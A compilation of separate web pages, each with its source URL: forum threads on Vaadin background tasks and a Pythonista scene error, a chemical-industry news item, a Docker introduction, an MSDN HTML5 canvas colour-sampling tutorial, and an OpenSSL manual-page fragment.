ENS Workshop Applications Are Now Open!

**A big thanks to our sponsors Aragon and Infura for helping to make this happen!**

What: Workshop to discuss the current state and future of ENS with the ENS team and others interested in the project
When: October 7, 2019 (the day before Devcon5 starts), during the day
Where: Near the Devcon5 conference site in Osaka, Japan (exact location will be shared with attendees closer to the event)
Who: The ENS team and others interested in the development of ENS
Application: CLOSED
Application deadline: August 31st, 2019; we will approve applications on a rolling basis
Cost: Free! But you must have your application approved to participate

* * *

We are pleased to announce that applications are now open for the third annual ENS workshop. The purpose of this event is to discuss the current state and future of ENS. Previous years have been a blast! You can read about last year’s workshop here.

If you have been following ENS closely, engaging in discussion on our forum, and/or using ENS in an interesting way, and you want to help influence the future of the project, this is for you. This is not an event for new users/developers to learn about ENS. As such, we’d like to limit participants to those able to contribute the most to discussions, hence the need for an application. Only those whose applications are accepted can participate. If you’d like to bring a friend or colleague, they must also submit an application and be approved.

Discussion topics may include things like cross-chain support, use of renewal fees, integration with DNS, and ENS’s relationship to the global namespace. But on your application, please tell us what you would like to discuss.

There is no cost to participants, and you will receive free food and some fun ENS swag. We look forward to seeing you!
https://medium.com/the-ethereum-name-service/ens-workshop-applications-are-now-open-f46db6c63384?utm_campaign=Decentral%20Cafe&utm_medium=email&utm_source=Revue%20newsletter
CC-MAIN-2019-43
refinedweb
317
60.24
Tutorial

How To Develop Applications on Kubernetes with Okteto

The author selected Girls Who Code to receive a donation as part of the Write for DOnations program.

Introduction

The Okteto CLI is an open-source project that provides a local development experience for applications running on Kubernetes. With it, you can write your code in your local IDE, and as soon as you save a file the changes can be pushed to your Kubernetes cluster and your app will immediately update. This whole process happens without the need to build Docker images or apply Kubernetes manifests, which can take considerable time.

In this tutorial, you’ll use Okteto to improve your productivity when developing a Kubernetes-native application. First, you’ll create a Kubernetes cluster and use it to run a standard “Hello World” application. Then you’ll use Okteto to develop and automatically update your application without having to install anything locally.

Prerequisites

Before you begin this tutorial, you’ll need the following:

- A Kubernetes 1.12+ cluster. In this tutorial, the setup will use a DigitalOcean Kubernetes cluster with three nodes, but you are free to create a cluster using another method.
- kubectl and doctl installed and configured to communicate with your cluster.
- A Docker Hub account.
- Docker running on your local machine.

Step 1 — Creating the Hello World Application

The “Hello World” program is a time-honored tradition in web development. In this case, it is a simple web service that responds “Hello World” to every request. Now that you’ve created your Kubernetes cluster, let’s create a “Hello World” app in Golang and the manifests that you’ll use to deploy it on Kubernetes.
First change to your home directory:

- cd ~

Now make a new directory called hello_world and move inside it:

- mkdir hello_world
- cd hello_world

Create and open a new file under the name main.go with your favorite IDE or text editor:

- nano main.go

main.go will be a Golang web server that returns the message Hello world!. So, let’s use the following code:

package main

import (
	"fmt"
	"net/http"
)

func main() {
	fmt.Println("Starting hello-world server...")
	http.HandleFunc("/", helloServer)
	if err := http.ListenAndServe(":8080", nil); err != nil {
		panic(err)
	}
}

func helloServer(w http.ResponseWriter, r *http.Request) {
	fmt.Fprint(w, "Hello world!")
}

The code in main.go does the following:

- The first statement in a Go source file must be the package name. Executable commands must always use package main.
- The import section indicates which packages the code depends on. In this case it uses fmt for string manipulation, and net/http for the HTTP server.
- The main function is the entry point to your binary. The http.HandleFunc method is used to configure the server to call the helloServer function when a request to the / path is received. http.ListenAndServe starts an HTTP server that listens on all network interfaces on port 8080.
- The helloServer function contains the logic of your request handler. In this case, it will write Hello world! as the response to the request.

You need to create a Docker image and push it to your Docker registry so that Kubernetes can pull it and then run the application.

Open a new file under the name Dockerfile with your favorite IDE or text editor:

- nano Dockerfile

The Dockerfile will contain the commands required to build your application’s Docker container. Let’s use the following code:

FROM golang:alpine as builder
RUN apk --update --no-cache add bash
WORKDIR /app
ADD . .
RUN go build -o app

FROM alpine as prod
WORKDIR /app
COPY --from=builder /app/app /app/app
EXPOSE 8080
CMD ["./app"]

The Dockerfile contains two stages, builder and prod:

- The builder stage contains the Go build tools. It’s responsible for copying the files and building the Go binary.
- The prod stage is the final image. It will contain only a stripped down OS and the application binary.

This is a good practice to follow.
It makes your production containers smaller and safer, since they only contain your application and exactly what is needed to run it.

Build the container image (replace your_DockerHub_username with your Docker Hub username):

- docker build -t your_DockerHub_username/hello-world:latest .

Now push it to Docker Hub:

- docker push your_DockerHub_username/hello-world:latest

Next, create a new folder for the Kubernetes manifests:

- mkdir k8s

When you use a Kubernetes manifest, you tell Kubernetes how you want your application to run. This time, you’ll create a deployment object. So, create a new file deployment.yaml with your favorite IDE or text editor:

- nano k8s/deployment.yaml

The following content describes a Kubernetes deployment object that runs the okteto/hello-world:latest Docker image. Add this content to your new file, but in your case replace okteto listed after the image label with your_DockerHub_username:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: hello-world
spec:
  selector:
    matchLabels:
      app: hello-world
  replicas: 1
  template:
    metadata:
      labels:
        app: hello-world
    spec:
      containers:
      - name: hello-world
        image: your_DockerHub_username/hello-world:latest
        ports:
        - containerPort: 8080

The deployment manifest has three main sections:

- metadata defines the name for your deployment.
- replicas defines how many copies of it you want running.
- template tells Kubernetes what to deploy, and what labels to add. In this case, a single container, with the okteto/hello-world:latest image, listening on port 8080, and with the app: hello-world label. Note that this label is the same one used in the selector section.

You’ll now need a way to access your application. You can expose an application on Kubernetes by creating a service object. Let’s continue using manifests to do that.
Create a new file called service.yaml with your favorite IDE or text editor:

- nano k8s/service.yaml

The following content describes a service that exposes the hello-world deployment object, which under the hood will use a DigitalOcean Load Balancer:

apiVersion: v1
kind: Service
metadata:
  name: hello-world
spec:
  type: LoadBalancer
  ports:
  - protocol: TCP
    port: 80
    targetPort: 8080
    name: http
  selector:
    app: hello-world

The service manifest has four main sections:

- metadata tells Kubernetes how to name your service.
- type tells Kubernetes how you want to expose your service. In this case, it will expose it externally through a DigitalOcean Load Balancer.
- The ports label tells Kubernetes which ports you want to expose, and how to map them to your deployment. In this case, you will expose port 80 externally and direct it to port 8080 in your deployment.
- selector tells Kubernetes how to direct traffic. In this case, any pod with the app: hello-world label will receive traffic.

You now have everything ready to deploy your “Hello World” application on Kubernetes. We will do this next.

Step 2 — Deploying Your Hello World Application

In this step you’ll deploy your “Hello World” application on Kubernetes, and then you’ll validate that it is working correctly.

Start by deploying your application on Kubernetes:

- kubectl apply -f k8s

You’ll see the following output:

Output
deployment.apps "hello-world" created
service "hello-world" created

After about one minute or so, you will be able to retrieve your application’s IP. Use this kubectl command to check your service:

- kubectl get service hello-world

You’ll see an output like this listing your Kubernetes service objects. Note your application’s IP in the EXTERNAL-IP column:

Output
NAME          TYPE           CLUSTER-IP        EXTERNAL-IP        PORT(S)   AGE
hello-world   LoadBalancer   your_cluster_ip   your_external_ip   80/TCP    37s

Open your browser and go to your_external_ip listed for your “Hello World” application.
Confirm that your application is up and running before continuing with the next step.

Until this moment, you’ve followed a fairly traditional pathway for developing applications with Kubernetes. Moving forward, whenever you want to change the code in your application, you’ll have to build and push a new Docker image, and then pull that image from Kubernetes. This process can take quite some time. Okteto was designed to streamline this development inner loop. Let’s look at the Okteto CLI and see just how it can help.

Step 3 — Installing the Okteto CLI

You will now improve your Kubernetes development productivity by installing the Okteto CLI. The Okteto command line interface is an open-source project that lets you synchronize application code changes to an application running on Kubernetes. You can continue using your favorite IDE, debuggers, or compilers without having to commit, build, push, or redeploy containers to test your application, as you did in the previous steps.

To install the Okteto CLI on a macOS or Linux machine, run the following command:

- curl -sSfL | sh

Let’s take a closer look at this command:

- The curl command is used to transfer data to and from a server.
- The -s flag suppresses any output.
- The -S flag shows errors.
- The -f flag causes the request to fail on HTTP errors.
- The -L flag makes the request follow redirects.
- The | operator pipes this output to the sh command, which will download and install the latest okteto binary on your local machine.

If you are running Windows, you can alternately download the file through your web browser and manually add it to your $PATH.

Once the Okteto CLI is installed, you are ready to put your “Hello World” application in development mode.

Step 4 — Putting Your Hello World Application in Development Mode

The Okteto CLI is designed to swap the application running on a Kubernetes cluster with the code you have in your machine. To do so, Okteto uses the information provided from an Okteto manifest file.
This file declares the Kubernetes deployment object that will swap with your local code.

Create a new file called okteto.yaml with your favorite IDE or text editor:

- nano okteto.yaml

Let’s write a basic manifest where you define the deployment object name, the Docker base image to use, and a shell. We will return to this information later. Use the following sample content file:

name: hello-world
image: okteto/golang:1
workdir: /app
command: ["bash"]

Prepare to put your application in development mode by running the following command:

- okteto up

Output
 ✓  Development environment activated
 ✓  Files synchronized
    Namespace: default
    Name:      hello-world

Welcome to your development environment. Happy coding!
default:hello-world /app>

The okteto up command swaps the “Hello World” application into a development environment, which means:

- The “Hello World” application container is updated with the Docker image okteto/golang:1. This image contains the required dev tools to build, test, debug, and run the “Hello World” application.
- A file synchronization service is created to keep your changes up to date between your local filesystem and your application pods.
- A remote shell starts in your development environment. Now you can build, test, and run your application as if you were on your local machine.

Whatever process you run in the remote shell will get the same incoming traffic, the same environment variables, volumes, or secrets as the original “Hello World” application pods. This, in turn, gives you a highly realistic, production-like development environment.

In the same console, now run the application as you would typically do (without building and pushing a Docker image), like this:

- go run main.go

Output
Starting hello-world server...

The first time you run the application, Go will download your dependencies and compile your application.
Wait for this process to finish and test your application by opening your browser and refreshing the page of your application, just as you did previously.

Now you are ready to begin developing directly on Kubernetes.

Step 5 — Developing Directly on Kubernetes

Let’s start making changes to the “Hello World” application and then see how these changes get reflected in Kubernetes.

Open the main.go file with your favorite IDE or text editor. For example, open a separate console and run the following command:

- nano main.go

Then, change your response message to Hello world from DigitalOcean! in the helloServer handler:

func helloServer(w http.ResponseWriter, r *http.Request) {
	fmt.Fprint(w, "Hello world from DigitalOcean!")
}

It is here that your workflow changes. Instead of building images and redeploying containers to update the “Hello World” application, Okteto will synchronize your changes to your development environment on Kubernetes.

From the console where you executed the okteto up command, cancel the execution of go run main.go by pressing CTRL + C. Now rerun the application:

- default:hello-world /app> go run main.go

Output
Starting hello-world server...

Go back to the browser and reload the page for your “Hello World” application. Your code changes were applied instantly to Kubernetes, and all without requiring any commits, builds, or pushes.

Conclusion

Okteto transforms your Kubernetes cluster into a fully featured development platform with the click of a button. In this tutorial you installed and configured the Okteto CLI to iterate on your code changes directly on Kubernetes as fast as you can type. Now you can head over to the Okteto samples repository to see how to use Okteto with different programming languages and debuggers.

Also, if you share a Kubernetes cluster with your team, consider giving each member access to a secure Kubernetes namespace, configured to be isolated from other developers working on the same cluster. This great functionality is also provided by the Okteto App in the DigitalOcean Kubernetes Marketplace.
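As an aside the tutorial itself does not cover: the helloServer handler from Step 1 can also be exercised entirely in-process with Go's httptest package, with no cluster or container involved. A minimal sketch (this file is illustrative and not part of the tutorial's sources):

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
)

// helloServer is the same handler main.go registers in Step 1.
func helloServer(w http.ResponseWriter, r *http.Request) {
	fmt.Fprint(w, "Hello world!")
}

// fetchHello spins up an in-process test server around the handler
// and returns the response body.
func fetchHello() string {
	srv := httptest.NewServer(http.HandlerFunc(helloServer))
	defer srv.Close()

	resp, err := http.Get(srv.URL)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	body, err := io.ReadAll(resp.Body)
	if err != nil {
		panic(err)
	}
	return string(body)
}

func main() {
	fmt.Println(fetchHello()) // prints: Hello world!
}
```

This kind of local check complements, rather than replaces, the okteto up workflow: it verifies the handler logic, while Okteto verifies the app in its real runtime environment.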
https://www.digitalocean.com/community/tutorials/how-to-develop-applications-on-kubernetes-with-okteto
CC-MAIN-2020-40
refinedweb
2,127
54.83
Search results for «type xwin»: downloads

- Tmxxine 0.7 by Tmxxine Team: Tmxxine is a linux distribution based on Puppy Linux 2.01. Here are some key features of "Tmxxine": All standard puppy software included: WP, Spreadsheet, Browser, editors, painting, vector editor, email, ftp, chat etc. Voice Synthesis. At the moment the Operating system is not singing to you b……
- Data::Type::Docs 0.01.15 by Murat Uenalan: Data::Type::Docs is a Perl module with the manual overview. MANUALS: Data::Type::Docs::FAQ Frequently asked questions. Data::Type::Docs::FOP Frequently occurring problems. Data::Type::Docs::Howto Point to point recipes how to get things done. Data::Type::Docs::RFC Exact API…
- Type Explorer 0.2 by Muthiah Annamalai: Texplore: Type Explorer for GObject based Libraries. You can see widget hierarchy, class, type relations, signals etc using this software, for any GObject based class, or library using it. What's New in This Release: Fixed lots of bugs in correctness. Functionally correct. Added flags……
- Imager::Filters 0.54 by Arnar M. Hrafnkelsson and Tony Cook di…
- File type determination 0.9 by jah: File type determination is a little KDE Service Menu that calls the GNU 'file' command to retrieve Mime information from files, and presents it inside a standard KDE dialog. Requirements: KDE…
- TCLP 0.4.4 by Emmanuel Coquery: TCLP is a prescriptive type system for Constraint Logic Programming, currently: ISO-Prolog, GNU-Prolog, Sicstus Prolog and its libraries, constraint programming libraries of Sicstus Prolog. Based on Typing Constraint Logic Programs by François Fages and Emmanuel Coquery. Journal of Theory and…
- Object::Relation::Meta::Type 0.1.0 by Kineticode, Inc.: Object::Relation::Meta::Type is an Object::Relation Data type validation and accessor building. Synopsis: Object::Relation::Meta::Type->add( key => "state", name => "State", builder => 'Object::Relation::Meta::AccessorBuilder', raw => sub { ref $_[0] ? s…
- fid-listbuffer 0.1.3 by Jon Cast…
- Palm::Progect::Converter::Text 2.0.4 by Michael Graham: Palm::Progect::Converter::Text is a Perl module to convert between Progect databases and Text files. SYNOPSIS: my $converter = Palm::Progect::Converter->new( format => 'Text', # ... other args ... ); $converter->load_records(); # ... do stuff with record…
- Bio::Graphics::Feature 1.4 by Lincoln Stein: Bio::Graphics::Feature is a simple feature object for use with Bio::Graphics::Panel. SYNOPSIS: use Bio::Graphics::Feature; # create a simple feature with no internal structure $f = Bio::Graphics::Feature->new(-start => 1000, -stop => 2000, …
- wmfortune 0.241 by Makoto SUGANO: wmfortune is a dock-app that shows you fortune messages. Installation: Before installation, make sure the fortune command is in your path. To compile and install wmfortune: (1) Edit Makefile as you like. (2) Type "make". (3) Then type "make install". To uninstall: ……
- Texplore 0.2 by Muthiah Annamalai. Insta…
- PLplot 5.6.1 by Alan W. Irwin……
- FileType 0.1.3 by Paul L Daniels: File commercia…
- Turnracer Build 1 by ATD: Turnracer is a free TBS racer game for GNU/Linux and other UNIX look-alikes. The rules of Turnracer aren't easy. Turnracer is written in C, and Gtk2 based. There is not yet an AI in the game, but it is planned for one of the next releases. Installation: 1. Make sure you have install tar a…
- gconfmm 2.16.0 by Murray Cumming: gconfmm are C++ wrappers for GConf. All classes are in the Gnome::Conf namespace. Installation: The simplest way to compile this package is: 1. `cd' to the directory containing the package's source code and type `./configure' to configure the package for your system. If you're using `c
http://nixbit.com/search/type-xwin/
CC-MAIN-2015-40
refinedweb
606
52.56
Opened 5 years ago
Closed 5 years ago

#19543 closed Bug (fixed)

SimpleLazyObject missing __repr__ proxy

Description

SimpleLazyObject (from django.utils.functional) does not proxy the __repr__ method.

Use case:

User.__unicode__ -> prints data for the user, for example: "user@email.com"
User.__repr__ -> prints debugging data, for example: "<User pk:1, email:user@email.com, points:123>"

__unicode__ is used by most of the application to render user content, so I can't override it for logging. __repr__ is used in logging.

Example user message: "Hi %s" % request.user
Example logging message: "%r just logged in" % request.user

When the user is wrapped with SimpleLazyObject, the __repr__ method of User is not called. My idea is to make it available like this:

SimpleLazyObject.__repr__ = lambda self: '<SimpleLazyObject: %r>' % self._wrapped

Patch:

--- a/django/utils/functional.py
+++ b/django/utils/functional.py
@@ -303,6 +303,9 @@ class SimpleLazyObject(LazyObject):
     def __reduce__(self):
         return (self.__newobj__, (self.__class__,), self.__getstate__())
 
+    def __repr__(self):
+        return '<SimpleLazyObject: %r>' % self._wrapped
+
     # Need to pretend to be the wrapped class, for the sake of objects that care
     # about this (especially in equality tests)
     __class__ = property(new_method_proxy(operator.attrgetter("__class__")))

Attachments (1)

Change History (7)

comment:1 Changed 5 years ago by

comment:2 Changed 5 years ago by

After some further discussion about the value in debugging, the following is now suggested:

- Do show in __repr__ that we are a lazy object.
- Check whether the lazy object has been evaluated.
- If not evaluated, include the repr of the setup function as the wrapped content, so that lazy objects are not evaluated at the time of the __repr__ call.
- Otherwise wrap the target instance's __repr__ method as proposed.

Changed 5 years ago by

implemented repr and updated test

comment:3 Changed 5 years ago by

the Github branch is

comment:4 Changed 5 years ago by

Looks good!
comment:5 Changed 5 years ago by

forgot to link the github pull request:

Since a lazy object represents itself as the target class, it should try to be that class as much as possible, and not try to be "something special" even though it is. So repr should just proxy like other magic methods on the class.

Accepting the ticket based on the fact that we should do something explicit for repr, but rejecting the wrapped result.
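The behavior suggested in comment:2 (show that we are lazy; show the setup function if unevaluated, the wrapped repr otherwise) can be sketched outside Django. The class below is a toy stand-in for illustration only; the names SimpleLazyObjectSketch, _setupfunc, and _empty are assumptions of this sketch, not Django's actual implementation:

```python
class SimpleLazyObjectSketch:
    """Toy lazy wrapper whose __repr__ never forces evaluation."""
    _empty = object()  # sentinel: "not evaluated yet"

    def __init__(self, func):
        self._setupfunc = func
        self._wrapped = self._empty

    def _setup(self):
        # Evaluate the factory exactly once, on first real use.
        self._wrapped = self._setupfunc()

    def __getattr__(self, name):
        # Any attribute access on the wrapper forces evaluation
        # and is then delegated to the wrapped object.
        if self._wrapped is self._empty:
            self._setup()
        return getattr(self._wrapped, name)

    def __repr__(self):
        if self._wrapped is self._empty:
            # Not evaluated: show the setup function instead of
            # evaluating just to build a debugging string.
            return '<SimpleLazyObjectSketch: %r>' % self._setupfunc
        return '<SimpleLazyObjectSketch: %r>' % self._wrapped
```

Calling `repr()` before any other attribute access shows the factory function; after the first delegated attribute access, it shows the wrapped value, which is exactly the logging-friendly behavior the ticket asks for.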
https://code.djangoproject.com/ticket/19543?cversion=0&cnum_hist=1
CC-MAIN-2018-22
refinedweb
382
55.13
The source code in this article is based on JDK 13.

SynchronousQueue

Translation of the official Javadoc

A blocking queue in which each insert operation must wait for a corresponding remove operation by another thread, and vice versa. A synchronous queue has no internal capacity:

- The peek() operation cannot be performed, because an element only exists when you try to remove it.
- You cannot insert an element (using any method) when there is no other thread waiting to remove one.
- You cannot iterate, because there is no element to iterate over.

The head of the queue is the element that the first queued inserting thread is trying to add; if there is no waiting inserting thread, no element can be removed, and the poll method will return null. Viewed as a collection, SynchronousQueue acts as an empty collection. This queue also does not accept null elements.

Synchronous queues are similar to rendezvous channels: something running in one thread must synchronously wait for something running in another thread in order to hand off some information, such as an event or a task.

This class supports an optional fairness policy. By default, ordering is not guaranteed; if the fair policy is specified in the constructor, threads are granted access in FIFO order.

This class is also part of the Java Collections Framework.

Source code definition

public class SynchronousQueue<E> extends AbstractQueue<E>
    implements BlockingQueue<E>, java.io.Serializable {

It extends AbstractQueue and implements BlockingQueue, so it is a blocking queue.

Attributes

// Class responsible for the transfer
private transient volatile Transferer<E> transferer;
// Queue lock
private ReentrantLock qlock;
// Producers' wait queue
private WaitQueue waitingProducers;
// Consumers' wait queue
private WaitQueue waitingConsumers;

There are four attributes in total. Apart from the reentrant lock, they are all internal implementation classes. Let's look at them in turn.

Transferer

An abstract class that defines the transfer behavior.
Its implementation classes are shown below.

abstract static class Transferer<E> {
    abstract E transfer(E e, boolean timed, long nanos);
}

TransferStack

The stack keeps its head node internally:

volatile SNode head;

SNode is also an internal class, and a relatively simple one:

static final class SNode {
    volatile SNode next;    // next node in stack
    volatile SNode match;   // the node matched to this
    volatile Thread waiter; // to control park/unpark
    Object item;            // data; or null for REQUESTs
    int mode;
}

It stores the value of the current node, the next node, and the node matched to the current node. It also stores the waiting thread, used for parking and unparking.

The TransferStack implementation of transfer is as follows:

@SuppressWarnings("unchecked")
E transfer(E e, boolean timed, long nanos) {
    SNode s = null; // constructed/reused as needed
    // Is the current request a producer (DATA) or a consumer (REQUEST)?
    int mode = (e == null) ? REQUEST : DATA;

    // spin
    for (;;) {
        SNode h = head;
        // The stack is empty, or the top node has the same mode as the current request
        if (h == null || h.mode == mode) {  // empty or same-mode
            if (timed && nanos <= 0L) {     // can't wait
                // The head node was cancelled: pop it and let the next node become the head
                if (h != null && h.isCancelled())
                    casHead(h, h.next);     // pop cancelled node
                else
                    // Timed out, but the head node is null or not cancelled: return null
                    return null;
            } else if (casHead(h, s = snode(s, e, h, mode))) {
                // The head node was updated to the current node;
                // now block and wait for a matching operation
                SNode m = awaitFulfill(s, timed, nanos);
                // If the returned node is s itself, the wait was cancelled
                if (m == s) {               // wait was cancelled
                    clean(s);
                    return null;
                }
                // If the head node is not null and its next node is s
                if ((h = head) != null && h.next == s)
                    casHead(h, s.next);     // help s's fulfiller
                // Return the item from the successful match
                return (E) ((mode == REQUEST) ? m.item : s.item);
            }
        } else if (!isFulfilling(h.mode)) { // try to fulfill: no matching in progress
            // Check whether the head node has been cancelled
            if (h.isCancelled())            // already cancelled
                casHead(h, h.next);         // pop and retry
            // Set the current node as the head node, in fulfilling mode
            else if (casHead(h, s=snode(s, e, h, FULFILLING|mode))) {
                // Wait for the match to succeed
                for (;;) { // loop until matched or waiters disappear
                    SNode m = s.next;       // m is s's match
                    if (m == null) {        // all waiters are gone
                        casHead(s, null);   // pop fulfill node
                        s = null;           // use new node next time
                        break;              // restart main loop
                    }
                    SNode mn = m.next;
                    if (m.tryMatch(s)) {
                        casHead(s, mn);     // pop both s and m
                        return (E) ((mode == REQUEST) ? m.item : s.item);
                    } else                  // lost match
                        s.casNext(m, mn);   // help unlink
                }
            }
        } else {                            // help a fulfiller
            SNode m = h.next;               // m is h's match
            if (m == null)                  // waiter is gone
                casHead(h, null);           // pop fulfilling node
            else {
                SNode mn = m.next;
                if (m.tryMatch(h))          // help match
                    casHead(h, mn);         // pop both h and m
                else                        // lost match
                    h.casNext(m, mn);       // help unlink
            }
        }
    }
}

The code is complex.
Let's walk through the branches:

- The stack is empty, or the top node has the same mode as the current request (both consumers, or both producers):
  - On timeout:
    - If the top node has been cancelled, replace it with its next node and spin again.
    - If the top node is null or not cancelled, return null directly.
  - No timeout: push the current node onto the top of the stack and wait for a match.
    - If the match fails (timeout or cancellation), return null.
    - If the match succeeds, return the corresponding element.
- The top node has a different mode and no match is in progress:
  - If the top node has been cancelled, pop it, replace it with its next node, and continue the loop.
  - Otherwise push the current node in fulfilling mode and spin, waiting for a match; on success return the element, on failure keep trying.
  - If updating the head fails, continue the loop.
- A match is already in progress: help update the head of the stack and the next pointers.

TransferQueue

First, the node type used in the queue, which holds a pointer to the next node, the element of the current node, and the waiting thread:

// Nodes in the queue
static final class QNode {
    volatile QNode next;    // next node in queue
    volatile Object item;   // CAS'ed to or from null
    volatile Thread waiter; // to control park/unpark
    final boolean isData;
}

Its attributes are the head and tail of the queue, plus a reference to a node awaiting cleanup:

transient volatile QNode head;
transient volatile QNode tail;
transient volatile QNode cleanMe;
@SuppressWarnings("unchecked")
E transfer(E e, boolean timed, long nanos) {
    QNode s = null; // constructed/reused as needed
    boolean isData = (e != null);

    for (;;) {
        QNode t = tail;
        QNode h = head;
        if (t == null || h == null)         // saw uninitialized value
            continue;                       // spin

        if (h == t || t.isData == isData) { // empty or same-mode
            QNode tn = t.next;
            if (t != tail)                  // inconsistent read
                continue;
            if (tn != null) {               // lagging tail
                advanceTail(t, tn);
                continue;
            }
            if (timed && nanos <= 0L)       // can't wait
                return null;
            if (s == null)
                s = new QNode(e, isData);
            if (!t.casNext(null, s))        // failed to link in
                continue;
            advanceTail(t, s);              // swing tail and wait
            // ... (the waiting and matching logic is omitted here)
        }
    }
}

The queue-based matching operation is as above, again spinning:

- If the head or tail is still uninitialized, spin.
- If the queue is empty, or all nodes in it have the same mode as the current request:
  - If the tail has changed, spin again.
  - If the tail is lagging, advance it and spin again.
  - On timeout, return null.
  - If the current node has not been created yet, create it.
  - If linking the current node at the tail of the queue fails, spin again.
  - Otherwise wait for a match: return null if it fails, or the matched element if it succeeds.
- If the queue is not empty and the head node has a different mode:
  - On a successful match, the head node leaves the queue and the waiting thread is woken up.

What is the difference between the two implementation classes? They are what implement fairness.

Constructors

public SynchronousQueue() {
    this(false);
}

public SynchronousQueue(boolean fair) {
    transferer = fair ? new TransferQueue<E>() : new TransferStack<E>();
}

If it is fair, the FIFO queue is used.
If it is not fair, the stack is used.

Enqueue method: put

public void put(E e) throws InterruptedException {
    if (e == null) throw new NullPointerException();
    if (transferer.transfer(e, false, 0) == null) {
        Thread.interrupted();
        throw new InterruptedException();
    }
}

It directly calls the transferer's transfer method, returning on success or throwing an exception otherwise. The other insertion methods are similar.

Dequeue method: take

public E take() throws InterruptedException {
    E e = transferer.transfer(null, false, 0);
    if (e != null)
        return e;
    Thread.interrupted();
    throw new InterruptedException();
}

It directly calls the transferer's transfer method, returning on success or throwing an exception otherwise. The other removal methods are similar.

WaitQueue

@SuppressWarnings("serial")
static class WaitQueue implements java.io.Serializable {
}

static class LifoWaitQueue extends WaitQueue {
    private static final long serialVersionUID = -3633113410248163686L;
}

static class FifoWaitQueue extends WaitQueue {
    private static final long serialVersionUID = -3623113410248163686L;
}

private WaitQueue waitingProducers;
private WaitQueue waitingConsumers;

The wait queues and the producer/consumer queues are empty classes, kept only for serialization compatibility with JDK 1.5.

Summary

SynchronousQueue uses either a queue or a stack, depending on whether it is fair, to hold the producers and consumers of pending requests. Producers and consumers are abstracted into nodes in the queue or stack. When each request arrives, it looks for a node of the other type to match with. If the match succeeds, both nodes leave the structure; if it fails, the node keeps trying.

Contact me

Finally, welcome to follow my personal official account, Yan Yan ten, where I post study notes for backend engineers. You are also welcome to contact me through the official account or by email. The above are all my personal thoughts; if there are any mistakes, please point them out in the comments.
https://programmer.group/juc-series-synchronization-queue.html
Introduction: How to Use an HC-SR04 Ultrasonic Sensor With Arduino

This instructable will show you how to use an HC-SR04 chip with Arduino. I got a kit from GearBest that has everything in it that you will need for this project; this kit is also very good for beginners, and I would recommend you check it out here.

You will need the following parts to make this work:
1) Arduino Uno
2) HC-SR04
3) Wires

Let's begin!

Step 1: Connect Everything Up

HC-SR04 | UNO
Vcc     | 5v
Gnd     | Gnd
Echo    | 11
Trig    | 12

That's it, super easy. Let's continue.

Step 2: Program It

You will need the NewPing library; you can download it here. I used the sample library sketch (also included below) and uploaded it to my Arduino UNO.

#include <NewPing.h>

#define TRIGGER_PIN  12  // Arduino pin tied to trigger pin on the ultrasonic sensor.
#define ECHO_PIN     11  // Arduino pin tied to echo pin on the ultrasonic sensor.
#define MAX_DISTANCE 200 // Maximum distance we want to ping for (in centimeters).

NewPing sonar(TRIGGER_PIN, ECHO_PIN, MAX_DISTANCE);

void setup() {
  Serial.begin(115200); // Open serial monitor to see ping results.
}

void loop() {
  delay(50);                     // Wait 50ms between pings.
  Serial.print("Ping: ");
  Serial.print(sonar.ping_cm()); // Send ping, get distance in cm (0 = outside range).
  Serial.println("cm");
}

Step 3: Test It Out

Open the Serial Port and test it out. You now should be done! If you have any questions, leave them in the comments and I will try to help you out. Thanks for reading!
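The NewPing library hides the math, but it helps to know what the sensor actually reports: an echo pulse whose width is the round-trip travel time of an ultrasonic burst. Converting that to centimeters is simple arithmetic. The helper below is illustrative only, not part of NewPing, and the pin handling in the comments is the usual manual approach.

```cpp
// Sound travels ~343 m/s, i.e. ~0.0343 cm per microsecond.
// The echo pulse spans the round trip, so halve the result.
double durationToCm(long durationMicros) {
    return durationMicros * 0.0343 / 2.0;
}

// In an Arduino sketch without NewPing, you would obtain the pulse yourself:
//   digitalWrite(TRIG_PIN, LOW);  delayMicroseconds(2);
//   digitalWrite(TRIG_PIN, HIGH); delayMicroseconds(10);
//   digitalWrite(TRIG_PIN, LOW);
//   long duration = pulseIn(ECHO_PIN, HIGH);
//   double cm = durationToCm(duration);
```

A 1000-microsecond echo pulse therefore corresponds to roughly 17 cm.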
http://www.instructables.com/id/How-to-Use-an-HC-SR04-Ultrasonic-Sensor-With-Ardui/
In C# 3.0 a new feature, automatic properties, was introduced. It allows us to create a class as a bag of setters and getters. You can create a class as follows:

public class Product
{
    public int Price { get; set; }
    public string Name { get; set; }
}

Each property is backed by a backing field. When you set the value of the property, the setter executes to set the value of the backing field. The catch is that to create a read-only property you have to invoke the setter in the constructor of the class and make the setter private:

public class Product
{
    public int Price { get; private set; }
    public string Name { get; set; }

    public Product()
    {
        Price = 10;
    }
}

In the above class definition the Price property is read-only and set to the default value 10, while you can set the value of the Name property outside the class. To create a read-only property with a default value, we created a private setter and then set the default value in the constructor.

In C# 6.0, you can directly create a property with a default value without invoking the setter. This feature of C# 6.0 is called property initializers. A property initializer allows you to create a property with a default value without invoking the setter; it sets the value of the backing field directly:

public class Product
{
    public int Price { get; set; } = 10;
    public string Name { get; set; }
}

In the above snippet we are setting the default value of the Price property to 10. However, after creating an instance of the class, the value of the Price property can still be changed. If you wish, you can create a read-only property by removing the setter. Since the setter is optional, it is easier to create immutable properties.
For your reference, source code harnessing the property initializer is given below:

using System;

namespace demo1
{
    class Program
    {
        static void Main(string[] args)
        {
            Product p = new Product { Name = "Pen" };
            Console.WriteLine(p.Price);
            Console.ReadKey(true);
        }
    }

    public class Product
    {
        public int Price { get; } = 10;
        public string Name { get; set; }
    }
}

We can summarize this post by stating the purpose of the auto-property initializer: it allows us to create an immutable property with a user-defined default value. To create properties with default values, you no longer have to invoke the setter. Happy coding.

One thought on "Property Initializers in C-Sharp 6.0"

It's very cool, very useful
https://debugmode.net/2014/11/18/auto-property-initializers-in-c-sharp-6-0/
Background/shared task on server?

As I understand it, each instance of my Vaadin application is tied to a session. So each user will see an independent view of the application and data. How can I create shared data so that each user sees the same, updating, data? Specifically, I would like to have a background task on the server updating the common data. Then each user can see the updated data. One solution is to use non-Vaadin processes to update a database. Then Vaadin just reads the DB for each client view application. But is there a simple way to create a server-side task and share the results among the running applications?

Have you considered just putting the data in a static variable (or a singleton), for example in your application class? For example:

public class GasDiaryApplication extends Application {
    // Data is shared between user sessions
    static Prevayler prevayler = null;
    static UserBase users = new UserBase();

    public void init() {
        ...
        // Initialize persistence if first instance
